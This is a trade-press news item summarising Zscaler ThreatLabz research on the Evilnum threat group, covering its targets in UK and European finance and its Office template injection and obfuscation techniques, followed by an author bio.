Malware, Content

How Evilnum Cyberattacks Target Microsoft Office Files

Cyber Security Ransomware Phishing Encrypted Technology

Zscaler, creator of the Zero Trust Exchange platform, is keeping close watch on a new advanced persistent threat (APT) actor known as Evilnum.

Since the start of 2022, Zscaler’s ThreatLabz research team identified several instances of Evilnum’s low-volume targeted attack campaigns launched against its customers in the UK and Europe.

Microsoft Office the Preferred Target

Evilnum targeted Windows Shortcut files (LNK) sent inside malicious archive files (ZIP) as attachments in spear phishing emails during earlier campaigns observed in 2021, Zscaler reports. Now, the threat actor is infecting MS Office documents by way of document template injection to deliver its malicious payload to victims’ machines.

ThreatLabz has identified several domains associated with Evilnum, having flown under the radar and staying undetected for an extended period, according to Zscaler.

What We Know About the Evilnum APT

  • Key targets are predominantly in the financial services sector, specifically companies dealing with trading and compliance in the UK and Europe.
  • March 2022 saw a significant increase in the choice of targets, including an intergovernmental organization that manages international migration services.
  • Cyberattacks and the type of target coincided with Russia-Ukraine conflict.
  • Macro-based documents were subject to a VBA code stomping technique to bypass static analysis and deter reverse engineering.
  • A heavily concealed JavaScript was used to decrypt and drop the payloads on the endpoint.
  • The names of all the file system artifacts created during execution tricked legitimate Windows and other third party binaries' names.
  • In each new instance of the campaign, Evilnum registered multiple domain names using specific keywords related to the industry vertical targeted.
Jim Masters

Jim Masters is Managing Editor of MSSP Alert, and holds a B.A. degree in Journalism from Northern Illinois University. His career has spanned governmental and investigative reporting for daily newspapers in the Northwest Indiana Region and 16 years in a global internal communications role for a Fortune 500 professional services company. Additionally, he is co-owner of the Lake County Corn Dogs minor league baseball franchise, located in Crown Point, Indiana. In his spare time, he enjoys writing and recording his own music, oil painting, biking, volleyball, golf and cheering on the Corn Dogs.